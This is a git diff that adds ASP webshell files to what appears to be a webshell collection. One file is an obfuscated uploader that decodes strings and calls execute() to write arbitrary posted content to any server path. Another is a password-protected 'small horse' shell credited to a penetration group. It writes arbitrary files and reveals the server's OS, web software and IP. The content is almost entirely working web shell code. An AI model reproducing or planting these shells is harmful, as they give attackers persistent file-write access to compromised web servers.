<%char1="Set objfSo = Server.CreateObjecth45asa&d%&Scripting.fileSy#!^$WtemObjecta&d%&w$@s"
|
||||||
|
execute(DecodeFun(char1))%>
|
||||||
|
<%if Trim(request("syfdpath"))<>"" then%>
|
||||||
|
<%char1="fdata = reque#!^$Wth45asa&d%&cyfddataa&d%&w$@s"
|
||||||
|
execute(DecodeFun(char1))%>
|
||||||
|
<%char1="Set objCountFile=objFSO.CreateTextFileh45asreque#!^$Wth45asa&d%&#!^$Wyfdpatha&d%&w$@s,Truew$@s"
|
||||||
|
execute(DecodeFun(char1))%>
|
||||||
|
<%char1="objCountFile.Write fdata"
|
||||||
|
execute(DecodeFun(char1))%>
|
||||||
|
<%if err =0 then%>
|
||||||
|
OK!</font>
|
||||||
|
<%else%>
|
||||||
|
NO!</font>
|
||||||
|
<%end if%>
|
||||||
|
<%err.clear%>
|
||||||
|
<%end if%>
|
||||||
|
<%char1="objCountFile.Clo#!^$We"
|
||||||
|
execute(DecodeFun(char1))%>
|
||||||
|
<%Set objCountFile=Nothing%>
|
||||||
|
<%Set objFSO = Nothing%>
|
||||||
|
<form action='' method=pOsT>
|
||||||
|
PATH:</font><br>
|
||||||
|
<input type=text name=syfdpath width=32 value="
|
||||||
|
<%char1="re#!^$Wpon#!^$We.write #!^$Werver.mappathh45asReque#!^$Wt.ServerVariable#!^$Wh45asa&d%&SCRIPT_NAMEa&d%&w$@sw$@s"
|
||||||
|
execute(DecodeFun(char1))%>" style="border:solid 1px" size=40><br>
|
||||||
|
GUT:<br>
|
||||||
|
<textarea name=cyfddata cols=39 rows=10 width=80 style="border:solid 1px"></textarea>
|
||||||
|
<br><input type=submit value=SAVE style="border:solid 1px">
|
||||||
|
</form>
|
||||||
|
|
54
asp/test.asp.txt
Normal file
54
asp/test.asp.txt
Normal file
|
@ -0,0 +1,54 @@
|
||||||
|
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
|
||||||
|
<title>STHx 渗透小组专用 ASP小马 by: STHx QQ:188388" </title>
|
||||||
|
|
||||||
|
<%
|
||||||
|
on error resume next
|
||||||
|
%>
|
||||||
|
<%
|
||||||
|
if request("pass")="hacker!@#" then '在这修改密码
|
||||||
|
session("pw")="go"
|
||||||
|
end if
|
||||||
|
%>
|
||||||
|
<%if session("pw")<>"go" then %>
|
||||||
|
<%="<center><br><form action='' method='post'>"%>
|
||||||
|
<%="<input name='pass' type='password' size='10'> <input "%><%="type='submit' value='我要进去'></center>"%>
|
||||||
|
<%else%>
|
||||||
|
<%
|
||||||
|
set fso=server.createobject("scripting.filesystemobject")
|
||||||
|
path=request("path")
|
||||||
|
if path<>"" then
|
||||||
|
data=request("da")
|
||||||
|
set da=fso.createtextfile(path,true)
|
||||||
|
da.write data
|
||||||
|
if err=0 then
|
||||||
|
%>
|
||||||
|
<%="yes"%>
|
||||||
|
<%else%>
|
||||||
|
<%="no"%>
|
||||||
|
<%
|
||||||
|
end if
|
||||||
|
err.clear
|
||||||
|
end if
|
||||||
|
da.close
|
||||||
|
%>
|
||||||
|
<%set da=nothing%>
|
||||||
|
<%set fos=nothing%>
|
||||||
|
<%="<form action='' method=post>"%>
|
||||||
|
<%="<input type=text name=path>"%>
|
||||||
|
<%="<br>"%>
|
||||||
|
<%="当前文件路径:"&server.mappath(request.servervariables("script_name"))%>
|
||||||
|
<%="<br>"%>
|
||||||
|
<%="操作系统为:"&Request.ServerVariables("OS")%>
|
||||||
|
<%="<br>"%>
|
||||||
|
<%="WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE")%>
|
||||||
|
<%="<br>"%>
|
||||||
|
<%="服务器的IP为:"&Request.ServerVariables("LOCAL_ADDR")%>
|
||||||
|
<%="<br>"%>
|
||||||
|
<%=""%>
|
||||||
|
<%="<textarea name=da cols=50 rows=10 width=30></textarea>"%>
|
||||||
|
<%="<br>"%>
|
||||||
|
<%="<input type=submit value=save>"%>
|
||||||
|
<%="</form>"%>
|
||||||
|
<%="<font face='黑体' color='red'> write by STHx QQ:188388 </font>"%>
|
||||||
|
<%="<a href='tencent://message/?uin=188388'>联系我</a>"%>
|
||||||
|
<%end if%></body></html>
|
1285
asp/传说中的hcker.asp.txt
Normal file
1285
asp/传说中的hcker.asp.txt
Normal file
File diff suppressed because one or more lines are too long
Loading…
Reference in a new issue